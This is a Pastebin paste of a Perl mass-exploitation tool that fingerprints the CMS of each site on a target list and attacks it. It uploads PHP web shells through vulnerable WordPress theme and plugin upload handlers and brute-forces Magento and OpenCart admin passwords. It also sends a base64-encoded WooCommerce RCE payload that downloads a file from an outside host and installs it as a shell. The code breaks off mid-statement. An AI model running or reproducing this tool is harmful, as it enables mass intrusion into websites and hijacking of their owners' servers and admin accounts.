daily pastebin goal
58%
SHARE
TWEET

Untitled

a guest Apr 20th, 2018 1,266 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2.  
  3. use WWW::Mechanize;
  4. use LWP::Simple;
  5. use URI::URL;
  6. use LWP::UserAgent;
  7. use Getopt::Long;
  8. use Parallel::ForkManager;
  9. use HTTP::Request::Common;
  10. use Term::ANSIColor;
  11. use HTTP::Request::Common qw(GET);
  12. use Getopt::Long;
  13. use HTTP::Request;
  14. use LWP::UserAgent;
  15. use Digest::MD5 qw(md5 md5_hex);
  16. use MIME::Base64;
  17. use IO::Select;
  18. use HTTP::Cookies;
  19. use HTTP::Response;
  20. use Term::ANSIColor;
  21. use HTTP::Request::Common qw(POST);
  22. use URI::URL;
  23. use DBI;
  24. use IO::Socket;
  25. use IO::Socket::INET;
  26. $ag = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
  27. #$ag = LWP::UserAgent->new();
  28. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  29. $ag->timeout(10);
  30. system('cls');
  31. my $datestring = localtime();
  32. my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
  33.  
  34. our($list,$thread);
  35. sub randomagent {
  36. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  37. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  38. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  39. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  40. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  41. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  42. );
  43. my $random = $array[rand @array];
  44. return($random);
  45. }
  46. GetOptions(
  47.     'url|u=s' => \$list,
  48.     'threads|t=i'   => \$thread,
  49. ) || &flag();
  50.  
  51. if(!defined($list) || !defined($thread)){
  52.     &flag();
  53.         exit;
  54. }
  55.  
  56. print "[+] Started : $datestring\n";
  57.  
  58.  
  59. my $ua = LWP::UserAgent->new;
  60. $ua->timeout(20);
  61.  
  62. @months = qw(01 02 03 04 05 06 07 08 09 10 11 12);
  63. ($second, $minute, $hour, $dayOfMonth, $month, $yearOffset, $dayOfWeek, $dayOfYear, $daylightSavings) = localtime();
  64. $year = 1900 + $yearOffset;
  65. $month = "$months[$month] ";
  66. my $datetime    = localtime;
  67.  
  68. system("title izocin priv8 tool v2.5");
  69. if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
  70. print color('bold green');
  71.  
  72. $tmp="tmp";
  73.     if (-e $tmp)
  74.     {
  75.     }
  76.     else
  77.     {
  78.         mkdir $tmp or die "Error creating directory: $tmp";
  79.     }
  80.  
  81. $rez="Result";
  82.     if (-e $rez)
  83.     {
  84.     }
  85.     else
  86.     {
  87.         mkdir $rez or die "Error creating directory: $rez";
  88.     }
  89.  
  90.  
  91.  
  92. print q(
  93.            izocin 2018 Server Auto Pentest Tool V2.5                                
  94. );
  95.  
  96. print color('reset');
  97. print "                       ";
  98. print colored ("[ 2018 Priv8 Tool ]",'white on_red');  
  99. print colored ("[ Coded By izocin ]\n",'white on_red');
  100. print "                           ";
  101. print colored ("[ Start At $datetime ]",'white on_red'),"\n\n";
  102.  
  103. $a = 0;
  104. open (THETARGET, "<$list") || die "[-] Can't open the file";
  105. @TARGETS = <THETARGET>;
  106. close THETARGET;
  107. $link=$#TARGETS + 1;
  108.  
  109.  
  110. print color("bold white"), "[+] Total sites : ";
  111. print color("bold red"), "".scalar(@TARGETS)."\n\n";
  112. print color('reset');
  113. my $pm = new Parallel::ForkManager($thread);# preparing fork
  114. OUTER: foreach $site(@TARGETS){#loop => working
  115. my $pid = $pm->start and next;
  116. chomp($site);
  117. if($site !~ /http:\/\//) { $site = "$site/"; };
  118. $a++;
  119. cms();
  120.     $pm->finish;
  121. }
  122. $pm->wait_all_children();
  123.  
  124. ################ CMS DETCTER #####################
  125. sub cms(){
  126. ##$ua = LWP::UserAgent->new(keep_alive => 1);
  127. $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  128. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  129. $ua->timeout (20);
  130. my $cms = $ua->get("$site")->content;
  131. my $cmsd = $ua->get("$site/wp-includes/js/jquery/jquery.js")->content;
  132. $wpsite = $site . '/wp-login.php';
  133. my $wpcms = $ua->get("$wpsite")->content;
  134. my $wpcmsx = $ua->get("$site/wp-login.php")->content;
  135. $jsite2 = $site . '/language/en-GB/en-GB.xml';
  136. my $jcms = $ua->get("$jsite2")->content;
  137. my $cms1 = $ua->get("$site/forum/register.php")->content;
  138. my $jx = $ua->get("$site/administrator/")->content;
  139. my $jxx = $ua->get("$site/joomla/")->content;
  140. $magsite = $site . '/admin';
  141. my $magcms = $ua->get("$magsite")->content;
  142. $dursite = $site . '/user/login';
  143. my $durcms = $ua->get("$dursite")->content;
  144. $lokomedia = "$site/smiley/1.gif";
  145. my $lokomediacms = $ua->get("$lokomedia")->content_type;
  146. $loko = "$site/rss.xml";
  147. my $lokomediacmstow = $ua->get("$loko")->content;
  148.  
  149. if($cms =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>| \/media\/system\/js\/|mootools-core.js|com_content|Joomla!/) {
  150. print color('bold white'),"\n[$a] $site - ";
  151.     print color("bold green"), "Joomla\n\n";
  152.     print color('reset');
  153.     open(save, '>>tmp/joomla.txt');
  154.     print save "$site\n";  
  155.     close(save);
  156.     exploitjoom();
  157. }
  158. elsif($cms =~/vBulletin|register.php|vbulletin|<meta name="description" content="vBulletin Forums" \/>|<meta name="generator" content="vBulletin" \/>|vBulletin.version =|"baseurl_core":/) {
  159. print color('bold white'),"\n[$a] $site - ";
  160.     print color("bold green"), "Vbulletin\n\n";
  161.     print color('reset');
  162.     open(save, '>>tmp/vbulletin.txt');
  163.     print save "$site\n";  
  164.     close(save);
  165.  
  166. }
  167. elsif($cms1 =~/vBulletin|vb_meta_bburl|vb_login_md5password|"baseurl_core":/) {
  168. print color('bold white'),"\n[$a] $site - ";
  169.     print color("bold green"), "Vbulletin-forum\n\n";
  170.     print color('reset');
  171.     open(save, '>>tmp/vbulletin.txt');
  172.     print save "$site\n";  
  173.     close(save);
  174. $site = $site . '/forum';  
  175.  
  176. }
  177. elsif($cms =~/wp-content/) {
  178.     print color('bold white'),"\n[$a] $site - ";
  179.     print color("bold green"), "WordPress\n\n";
  180.     print color('reset');
  181.     open(save, '>>tmp/Wordpress.txt');
  182.     print save "$site\n";
  183.     close(save);
  184.     exploitwp();
  185. }
  186. elsif($wpcms =~/WordPress/) {
  187.     print color('bold white'),"\n[$a] $site - ";
  188.     print color("bold green"), "WordPress\n\n";
  189.     print color('reset');
  190.     open(save, '>>tmp/Wordpress.txt');
  191.     print save "$site\n";
  192.     close(save);
  193.     exploitwp();
  194. }
  195. elsif($wpcmsx =~/WordPress/) {
  196.     print color('bold white'),"\n[$a] $site - ";
  197.     print color("bold green"), "WordPress\n\n";
  198.     print color('reset');
  199.     open(save, '>>tmp/Wordpress.txt');
  200.     print save "$site\n";
  201.     close(save);
  202.     exploitwp();
  203. }
  204. elsif($cmsd =~/password/) {
  205.     print color('bold white'),"\n[$a] $site - ";
  206.     print color("bold green"), "WordPress\n\n";
  207.     print color('reset');
  208.     open(save, '>>tmp/Wordpress.txt');
  209.     print save "$site\n";
  210.     close(save);
  211.     exploitwp();
  212. }
  213. elsif($durcms =~/Drupal|drupal|sites/) {
  214.     print color('bold white'),"\n[$a] $site - ";
  215.     print color("bold green"), "DruPal\n\n";
  216.     print color('reset');
  217.     open(save, '>>tmp/drupal.txt');
  218.     print save "$site\n";  
  219.     close(save);
  220.     drupal();
  221. }
  222. elsif($magcms =~/Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento/) {
  223. print color('bold white'),"\n[$a] $site - ";
  224.     print color("bold green"), "Magento\n\n";
  225.     print color('reset');
  226.     open(save, '>>tmp/magento.txt');
  227.     print save "$site\n";  
  228.     close(save);
  229.   magento();
  230.   magentox();
  231. }
  232.  
  233. elsif($cms =~/route=product|OpenCart|route=common|catalog\/view\/theme/) {
  234. print color('bold white'),"\n[$a] $site - ";
  235.     print color("bold green"), "Opencart\n\n";
  236.     print color('reset');
  237.     open(save, '>>tmp/opencart.txt');
  238.     print save "$site\n";  
  239.     close(save);
  240.     opencart();
  241. }
  242. elsif($cms =~/xenforo|XenForo|uix_sidePane_content/) {
  243.     print color('bold white'),"\n[$a] $site - ";
  244.     print color("bold green"), "XenForo\n\n";
  245.     print color('reset');
  246.     open(save, '>>tmp/XenForo.txt');
  247.     print save "$site\n";
  248.     close(save);
  249.  
  250. }
  251. elsif($jcms =~/joomla|com_content|Joomla!/) {
  252. print color('bold white'),"\n[$a] $site - ";
  253.     print color("bold green"), "Joomla\n\n";
  254.     print color('reset');
  255.     open(save, '>>tmp/joomla.txt');
  256.     print save "$site\n";  
  257.     close(save);
  258.     exploitjoom();
  259. }
  260. elsif($jx =~/com_option|com_content|Joomla!/) {
  261. print color('bold white'),"\n[$a] $site - ";
  262.     print color("bold green"), "Joomla\n\n";
  263.     print color('reset');
  264.     open(save, '>>tmp/joomla.txt');
  265.     print save "$site\n";  
  266.     close(save);
  267. $site = $site . '/joomla/';
  268.     exploitjoom();
  269. }
  270. elsif($jxx =~/com_option|com_content|Joomla!/) {
  271. print color('bold white'),"\n[$a] $site - ";
  272.     print color("bold green"), "Joomla\n\n";
  273.     print color('reset');
  274.     open(save, '>>tmp/joomla.txt');
  275.     print save "$site\n";  
  276.     close(save);
  277.     exploitjoom();
  278. }
  279. elsif($cms =~/Prestashop|prestashop/) {
  280.     print color('bold white'),"\n[$a] $site - ";
  281.     print color("bold green"), "Prestashop\n\n";
  282.     print color('reset');
  283.     open(save, '>>tmp/Prestashop.txt');
  284.     print save "$site\n";  
  285.     close(save);
  286.  
  287.  
  288.  
  289. columnadverts();
  290. soopamobile();
  291. soopabanners();
  292. vtermslideshow();
  293. simpleslideshow();
  294. productpageadverts();
  295. homepageadvertise();
  296. homepageadvertise2();
  297. jro_homepageadvertise();
  298. attributewizardpro();
  299. oneattributewizardpro();
  300. attributewizardproOLD();
  301. attributewizardpro_x();
  302. advancedslider();
  303. cartabandonmentpro();
  304. cartabandonmentproOld();
  305. videostab();
  306. wg24themeadministration();
  307. fieldvmegamenu();
  308. wdoptionpanel();
  309. pk_flexmenu();
  310. pk_vertflexmenu();
  311. nvn_export_orders();
  312. megamenu();
  313. tdpsthemeoptionpanel();
  314. psmodthemeoptionpanel();
  315. masseditproduct();
  316. blocktestimonial();
  317. }
  318. elsif($lokomediacms =~/image\/gif/) {
  319. print color('bold white'),"\n[$a] $site - ";
  320.     print color("bold green"), "Lokomedia\n\n";
  321.     print color('reset');
  322.     open(save, '>>tmp/lokomedia.txt');
  323.     print save "$site\n";  
  324.     close(save);
  325.     lokomedia();
  326. }
  327. elsif($lokomediacmstow =~/lokomedia/) {
  328. print color('bold white'),"\n[$a] $site - ";
  329.     print color("bold green"), "Lokomedia\n\n";
  330.     print color('reset');
  331.     open(save, '>>tmp/lokomedia.txt');
  332.     print save "$site\n";  
  333.     close(save);
  334.     lokomedia();
  335. }
  336.  
  337. else{
  338. print color('bold white'),"\n[$a] $site - ";
  339.     print color("bold green"), "Unknown\n\n";
  340.     open(save, '>>tmp/Unknown.txt');
  341.     print color('reset');
  342.     print save "$site\n";  
  343.     close(save);
  344.     #adfin();  
  345.     #usql();
  346.     #elfind();
  347.     #kcfind();
  348.     #apachistrus();
  349.     #pma();
  350. }
  351. }
  352. ###### Admin SCAN ######
  353. ######################
  354. ######################
  355. ######################
  356. sub adfin(){
  357. @pat=('/admin/login.php', '/admin/admin.php', '/admin/', '/admin.php', '/admin/login.html');
  358. foreach $pma(@pat){
  359. chomp $pma;
  360.  
  361. $url = $site.$pma;
  362. $req = HTTP::Request->new(GET=>$url);
  363. $userAgent = LWP::UserAgent->new();
  364. $response = $userAgent->request($req);
  365. $ar = $response->content;
  366. if ($ar =~ m/type="password"|Username|Password|login/g){
  367. print color('bold red'),"[";
  368. print color('bold green'),"+";
  369. print color('bold red'),"] ";
  370. print color('bold white'),"Admin Panel";
  371. print color('bold white')," ............... ";
  372. print color('bold white'),"";
  373. print color('bold green'),"Found";
  374. print color('bold white'),"\n";
  375. print color('bold green'),"[";
  376. print color('bold red'),"+";
  377. print color('bold green'),"]";
  378. print color('bold white'),"[Link] => $url\n";
  379. open (TEXT, '>>Result/panel.txt');
  380. print TEXT "$url =>#or user : '=''or'   --- pass: '=''or' and  ' or '1'='1 and or 1=1\n";
  381. close (TEXT);
  382. }else{
  383. print color('bold red'),"[";
  384. print color('bold green'),"+";
  385. print color('bold red'),"] ";
  386. print color('bold white'),"Admin Panel";
  387. print color('bold white')," ............... ";
  388. print color('bold red'),"Failed";
  389. print color('bold white'),"\n";}
  390. }
  391. }
  392.  
  393. sub exploitwp(){
  394.     vers();
  395.     getins();  
  396.     addblockblocker();
  397.     worce();
  398.     cubed();
  399.     rhgty();
  400.     dzupx();
  401.     rhgbb();
  402.     comsxx();
  403.     comzzz();
  404.     seoww();
  405.     comzcc();
  406.     pith();
  407.     satos();
  408.     pinb();
  409.     barc();
  410.     bard();
  411.     asrd();
  412.     evol();
  413.     acft();
  414.     #desg();   
  415.     wof();
  416.     wof1();
  417.     virald();
  418.     viraldz();
  419.     viraldzy();
  420.     viraldzyx();   
  421.     viraldd();
  422.     wof2();
  423.     wof3();
  424.     tst(); 
  425.     learndash();
  426.     learndashx();
  427.     learndash2();
  428.     wofind();  
  429.     mms();
  430.     xxsav();
  431.     xxsd();
  432.     at1();
  433.     at2();
  434.     viral();
  435.     jsor();
  436.     wptema();  
  437.     blaze();
  438.     catpro();
  439.     xxcc();
  440.     nineto();  
  441.     cherry();
  442.     downloadsmanager();
  443.     expadd();
  444.     expaddd();
  445.     formcraft();
  446.     formcraft2();
  447.     brainstorm();
  448.     xav();
  449.     izxc();
  450.     con7();
  451.     fuild();
  452.     levoslideshow();
  453.     vertical();
  454.     carousel();
  455.     superb();
  456.     yass();
  457.     homepage();
  458.     ipage();
  459.     bliss();   
  460.     xdata();   
  461.     powerzoomer();
  462.     gravityforms();
  463.     gravityformsb();
  464.     revslider();
  465.     getconfig();
  466.     getcpconfig();
  467.     showbiz();
  468.     ads();
  469.     slideshowpro();
  470.     wpmobiledetector();
  471.     wysija();
  472.     inboundiomarketing();
  473.     dzszoomsounds();
  474.     reflexgallery();
  475.     sexycontactform();
  476.     realestate();
  477.     wtffu();
  478.     wpjm();
  479.     phpeventcalendar();
  480.     phpeventcalendars();   
  481.     synoptic();
  482.     udesig();
  483.     workf();
  484.     Wpshop();
  485.     wpinjection();
  486.     adad();
  487.     wplfd();
  488.     wpbrute();
  489. }
  490. sub exploitjoom(){
  491.   versij();
  492.   comjce();
  493.   txrt();
  494.   comedia();
  495.   comjdownloads();
  496.   comfabrik();
  497.   comfabi2();
  498.   comfabrikdef2();
  499.   comjb();
  500.   comsjb();
  501.   foxfind();
  502.   foxcontact();
  503.   fox2();
  504.   comadsmanager();
  505.   comblog();
  506.   b2j();
  507.   b22j();
  508.   sexycontactform();
  509.   rocks();
  510.   sujks();
  511.   comusers();
  512.   comweblinks();
  513.   mod_simplefileupload();
  514.   asxxdd();
  515.   comjwallpapers();
  516.   redmy();
  517.   facile();
  518.   jomlfd();
  519.   joomlabrute();
  520. }
  521.  
  522.  
  523. sub magento{
  524. $magsite = $site . '/admin';
  525.  
  526. $ua = LWP::UserAgent->new(keep_alive => 1);
  527. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  528. $ua->timeout (30);
  529. $ua->cookie_jar(
  530.         HTTP::Cookies->new(
  531.             file => 'mycookies.txt',
  532.             autosave => 1
  533.         )
  534.     );
  535.    
  536. $getoken = $ua->get($magsite)->content;
  537. if ( $getoken =~ /type="hidden" value="(.*)"/ ) {
  538. $token = $1 ;
  539. }else{
  540. print "[-] Can't Grabb Magento Token !\n";
  541. next OUTER;
  542. }
  543.  
  544. print"[-] Starting brute force";
  545. @pats=('123456','admin123','123','1234','admin','password','root');
  546. foreach $pmas(@pats){
  547. chomp $pmas;
  548. $maguser = "admin";
  549. $magpass = $pmas;
  550. print "\n[-] Trying: $magpass ";
  551.  
  552. $magbrute = POST $magsite, ["form_key" => "$token", "login[username]" => "$maguser", "dummy" => "", "login[password]" => "$magpass"];
  553. $response = $ua->request($magbrute);
  554. my $pwnd = $ua->get("$magsite")->content;
  555. if ($pwnd =~ /logout/){
  556. print "- ";
  557. print color('bold green'),"FOUND -> $magsite => User: $maguser Pass: $magpass\n";
  558. print color('reset');
  559. open (TEXT, '>>Result/magentopass.txt');
  560. print TEXT "$magsite => User: $maguser Pass: $magpass\n";
  561. close (TEXT);
  562. next OUTER;
  563. }
  564. }
  565. }
  566. sub magentox{
  567. system("php tool/magento.php '$site'");
  568. }
  569. sub opencart{
  570. print"[-] Starting brute force";
  571. @patsx=('123456','admin123','123','1234','admin','password','root');
  572. foreach $pmasx(@patsx){
  573. chomp $pmasx;
  574. $ocuser = admin;
  575. $ocpass = $pmasx;
  576. print "\n[-] Trying: $ocpass ";
  577. $OpenCart= $site . '/admin/index.php';
  578.  
  579. $ocbrute = POST $OpenCart, [username => $ocuser, password => $ocpass,];
  580. $response = $ua->request($ocbrute);
  581. $stat = $response->status_line;
  582. if ($stat =~ /302/){
  583. print "- ";
  584. print color('bold green'),"FOUND\n";
  585. print color('reset');
  586. open (TEXT, '>>Result/opencardpass.txt');
  587. print TEXT "$OpenCart => User: $ocuser Pass: $ocpass\n";
  588. close (TEXT);
  589. next OUTER;
  590. }
  591. }
  592. }
  593.  
  594. ################ Version #####################
  595. sub vers(){
  596.  
  597. $getversion = $ua->get($site)->content;
  598.  
  599. if($getversion =~/content="WordPress (.*?)"/) {
  600. print color('bold red'),"[";
  601. print color('bold green'),"+";
  602. print color('bold red'),"] ";
  603. print color('bold white'),"Wp Version";
  604. print color('bold white')," ........................ ";
  605. print color('bold white'),"";
  606. print color('bold green'),"$1";
  607. print color('bold white'),"\n";
  608. open (TEXT, '>>Result/version.txt');
  609. print TEXT "wp => $site => $1\n";
  610. close (TEXT);
  611. }else{
  612. print color('bold red'),"[";
  613. print color('bold green'),"+";
  614. print color('bold red'),"] ";
  615. print color('bold white'),"Wp Version";
  616. print color('bold white')," ........................ ";
  617. print color('bold red'),"Failed";
  618. print color('bold white'),"\n";}
  619. }
  620. sub getins(){
  621. $url = "$site/wp-admin/install.php?step=1";
  622.  
  623. $resp = $ua->request(HTTP::Request->new(GET => $url ));
  624. $conttt = $resp->content;
  625. if($conttt =~ m/Install WordPress/g){
  626. print color('bold red'),"[";
  627. print color('bold green'),"+";
  628. print color('bold red'),"] ";
  629. print color('bold white'),"Wordpress installer";
  630. print color('bold white')," ............... ";
  631. print color('bold green'),"VULN\n";
  632.      open(save, '>>Result/install.txt');  
  633.     print save "[wpinstall] $url\n";  
  634.     close(save);
  635. }else{
  636. print color('bold red'),"[";
  637. print color('bold green'),"+";
  638. print color('bold red'),"] ";
  639. print color('bold white'),"Wordpress installer";
  640. print color('bold white')," ............... ";
  641. print color('bold red'),"Failed\n";
  642. }
  643. }
  644. ################ Adblock Blocker #####################
  645. sub addblockblocker(){
  646.  
  647. my $addblockurl = "$site/wp-admin/admin-ajax.php?action=getcountryuser&cs=2";
  648. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [popimg => ["tool/XAttacker.php"],]);
  649. $addblockup="$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  650. my $checkaddblock = $ua->get("$addblockup")->content;
  651.  
  652. if($checkaddblock =~/X Attacker/) {
  653. print color('bold red'),"[";
  654. print color('bold green'),"+";
  655. print color('bold red'),"] ";
  656. print color('bold white'),"Adblock Blocker";
  657. print color('bold white')," ................... ";
  658. print color('bold white'),"";
  659. print color('bold green'),"VULN";
  660. print color('bold white'),"\n";
  661. print color('bold green')," [";
  662. print color('bold red'),"+";
  663. print color('bold green'),"] ";
  664. print color('bold white'),"Shell Uploaded Successfully\n";
  665. print color('bold white'),"  [Link] => $addblockup\n";
  666. open (TEXT, '>>Result/Shells.txt');
  667. print TEXT "$addblockup\n";
  668. close (TEXT);
  669. }else{
  670. print color('bold red'),"[";
  671. print color('bold green'),"+";
  672. print color('bold red'),"] ";
  673. print color('bold white'),"Adblock Blocker";
  674. print color('bold white')," ................... ";
  675. print color('bold red'),"Failed";
  676. print color('bold white'),"\n";}
  677. }
  678.  
  679. ################ woocommerce RCE #####################
  680. sub worce(){
  681.  
  682. my $addblockurl = "$site/produits/?items_per_page=%24%7b%40eval(base64_decode(cGFzc3RocnUoJ2NkIHdwLWNvbnRlbnQvdXBsb2Fkcy8yMDE4LzAxO3dnZXQgaHR0cDovL3d3dy5hd3RjLmFpZHQuZWR1Ly9jb21wb25lbnRzL2NvbV9iMmpjb250YWN0L3VwbG9hZHMvdHh0LnR4dDttdiB0eHQudHh0IGl6b20ucGhwJyk7))%7d&setListingType=grid";
  683.  
  684. my $checkaddblock = $ua->get("$addblockurl")->content;
  685. $dmup="$site/wp-content/uploads/2018/01/izom.php";
  686. my $checkdm = $ua->get("$dmup")->content;
  687. if($checkdm =~/SangPujaan/) {
  688. print color('bold red'),"[";
  689. print color('bold green'),"+";
  690. print color('bold red'),"] ";
  691. print color('bold white'),"woocommerce RCE";
  692. print color('bold white')," ................... ";
  693. print color('bold white'),"";
  694. print color('bold green'),"VULN";
  695. print color('bold white'),"\n";
  696. print color('bold green')," [";
  697. print color('bold red'),"+";
  698. print color('bold green'),"] ";
  699. print color('bold white'),"Shell Uploaded Successfully\n";
  700. print color('bold white'),"  [Link] => $addblockup\n";
  701. open (TEXT, '>>Result/Shells.txt');
  702. print TEXT "$addblockup\n";
  703. close (TEXT);
  704. }else{
  705. print color('bold red'),"[";
  706. print color('bold green'),"+";
  707. print color('bold red'),"] ";
  708. print color('bold white'),"woocommerce RCE";
  709. print color('bold white')," ................... ";
  710. print color('bold red'),"Failed";
  711. print color('bold white'),"\n";}
  712. }
  713. ################ cubed #####################
  714. sub cubed(){
  715.  
  716. my $addblockurl = "$site/wp-content/themes/cubed_v1.2/functions/upload-handler.php";
  717. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [uploadfile => ["tool/XAttacker.php"],]);
  718. $addblockup="$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  719. my $checkaddblock = $ua->get("$addblockup")->content;
  720.  
  721. if($checkaddblock =~/X Attacker/) {
  722. print color('bold red'),"[";
  723. print color('bold green'),"+";
  724. print color('bold red'),"] ";
  725. print color('bold white'),"cubed_v1.2 thme";
  726. print color('bold white')," ................... ";
  727. print color('bold white'),"";
  728. print color('bold green'),"VULN";
  729. print color('bold white'),"\n";
  730. print color('bold green')," [";
  731. print color('bold red'),"+";
  732. print color('bold green'),"] ";
  733. print color('bold white'),"Shell Uploaded Successfully\n";
  734. print color('bold white'),"  [Link] => $addblockup\n";
  735. open (TEXT, '>>Result/Shells.txt');
  736. print TEXT "$addblockup\n";
  737. close (TEXT);
  738. }else{
  739. print color('bold red'),"[";
  740. print color('bold green'),"+";
  741. print color('bold red'),"] ";
  742. print color('bold white'),"cubed_v1.2 thme";
  743. print color('bold white')," ................... ";
  744. print color('bold red'),"Failed";
  745. print color('bold white'),"\n";}
  746. }
  747. ################ cubed #####################
  748. sub rhgty(){
  749.  
  750. my $addblockurl = "$site/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php";
  751. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"],]);
  752. $addblockup="$site/wp-content/uploads/settingsimages/XAttacker.php?X=Attacker";
  753. my $checkaddblock = $ua->get("$addblockup")->content;
  754.  
  755. if($checkaddblock =~/X Attacker/) {
  756. print color('bold red'),"[";
  757. print color('bold green'),"+";
  758. print color('bold red'),"] ";
  759. print color('bold white'),"RightNow thmess";
  760. print color('bold white')," ................... ";
  761. print color('bold white'),"";
  762. print color('bold green'),"VULN";
  763. print color('bold white'),"\n";
  764. print color('bold green')," [";
  765. print color('bold red'),"+";
  766. print color('bold green'),"] ";
  767. print color('bold white'),"Shell Uploaded Successfully\n";
  768. print color('bold white'),"  [Link] => $addblockup\n";
  769. open (TEXT, '>>Result/Shells.txt');
  770. print TEXT "$addblockup\n";
  771. close (TEXT);
  772. }else{
  773. print color('bold red'),"[";
  774. print color('bold green'),"+";
  775. print color('bold red'),"] ";
  776. print color('bold white'),"RightNow thmess";
  777. print color('bold white')," ................... ";
  778. print color('bold red'),"Failed";
  779. print color('bold white'),"\n";}
  780. }
  781. ################ cubed #####################
  782. sub dzupx(){
  783.  
  784. my $addblockurl = "$site/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php";
  785. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [file => ["tool/XAttacker.php"],]);
  786. if ($response->content =~ /"(.*?)"/) {
  787. $uploadfolder=$1.'?X=Attacker';
  788. }
  789. $addblockup="$site/wp-content/uploads/settingsimages/$year/$month/$uploadfolder";
  790. my $checkaddblock = $ua->get("$addblockup")->content;
  791.  
  792. if($checkaddblock =~/X Attacker/) {
  793. print color('bold red'),"[";
  794. print color('bold green'),"+";
  795. print color('bold red'),"] ";
  796. print color('bold white'),"Tevolution plug";
  797. print color('bold white')," ................... ";
  798. print color('bold white'),"";
  799. print color('bold green'),"VULN";
  800. print color('bold white'),"\n";
  801. print color('bold green')," [";
  802. print color('bold red'),"+";
  803. print color('bold green'),"] ";
  804. print color('bold white'),"Shell Uploaded Successfully\n";
  805. print color('bold white'),"  [Link] => $addblockup\n";
  806. open (TEXT, '>>Result/Shells.txt');
  807. print TEXT "$addblockup\n";
  808. close (TEXT);
  809. }else{
  810. print color('bold red'),"[";
  811. print color('bold green'),"+";
  812. print color('bold red'),"] ";
  813. print color('bold white'),"Tevolution plug";
  814. print color('bold white')," ................... ";
  815. print color('bold red'),"Failed";
  816. print color('bold white'),"\n";}
  817. }
  818. ################ cubed #####################
  819. sub rhgbb(){
  820.  
  821. my $addblockurl = "$site/wp-content/plugins/dzs-videowhisper/upload.php";
  822. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [file_field => ["tool/XAttacker.php"],]);
  823. $addblockup="$site/wp-content/plugins/dzs-videowhisper/upload/XAttacker.phtml?X=Attacker";
  824. my $checkaddblock = $ua->get("$addblockup")->content;
  825.  
  826. if($checkaddblock =~/X Attacker/) {
  827. print color('bold red'),"[";
  828. print color('bold green'),"+";
  829. print color('bold red'),"] ";
  830. print color('bold white'),"dzs-videowhisper";
  831. print color('bold white')," .................. ";
  832. print color('bold white'),"";
  833. print color('bold green'),"VULN";
  834. print color('bold white'),"\n";
  835. print color('bold green')," [";
  836. print color('bold red'),"+";
  837. print color('bold green'),"] ";
  838. print color('bold white'),"Shell Uploaded Successfully\n";
  839. print color('bold white'),"  [Link] => $addblockup\n";
  840. open (TEXT, '>>Result/Shells.txt');
  841. print TEXT "$addblockup\n";
  842. close (TEXT);
  843. }else{
  844. print color('bold red'),"[";
  845. print color('bold green'),"+";
  846. print color('bold red'),"] ";
  847. print color('bold white'),"dzs-videowhisper";
  848. print color('bold white')," .................. ";
  849. print color('bold red'),"Failed";
  850. print color('bold white'),"\n";}
  851. }
  852. ################ Com Media #####################
  853. sub comsxx(){
  854. my $url = "$site/wp-content/plugins/contus-video-galleryversion-10/upload1.php";
  855. my $inn ="tool/XAttacker.php";
  856. my $field_name = "myfile";
  857.  
  858. my $response = $ua->post( $url,
  859.             Content_Type => 'multipart/form-data',
  860.             Content => [ $field_name => ["$inn"],"mode" => "image" ]
  861.            
  862.             );
  863. if ($response->content =~ /(.*?)php/) {
  864. $uploadfolder=$1.'php?X=Attacker';
  865. }          
  866.  
  867. $mediauph="$site/wp-content/uploads/$uploadfolder";
  868.  
  869. $checkpofwuph = $ua->get("$mediauph")->content;
  870. if($checkpofwuph =~/X Attacker/) {
  871. print color('bold red'),"[";
  872. print color('bold green'),"+";
  873. print color('bold red'),"] ";
  874. print color('bold white'),"galleryversion Shel";
  875. print color('bold white')," .............. ";
  876. print color('bold green'),"VULN\n";
  877. print color('bold green')," [";
  878. print color('bold red'),"+";
  879. print color('bold green'),"] ";
  880. print color('bold white'),"Shell Uploaded Successfully\n";
  881. print color('bold white'),"  [Link] => $mediauph\n";
  882. open (TEXT, '>>Result/shells.txt');
  883. print TEXT "$mediauph\n";
  884. close (TEXT);
  885. }else{
  886. print color('bold red'),"[";
  887. print color('bold green'),"+";
  888. print color('bold red'),"] ";
  889. print color('bold white'),"galleryversion";
  890. print color('bold white')," .................... ";
  891. print color('bold red'),"Failed\n";
  892. }
  893. }
  894. ################ comadsmanager #####################
  895. sub comzzz(){
  896. my $url = "$site/wp-content/themes/konzept/includes/uploadify/upload.php";
  897.  
  898. my $response = $ua->post( $url,
  899.             Cookie => "", Content_Type => "form-data", Content => [file => ["tool/BackDoor.jpg"], name => "XAttacker.php"]
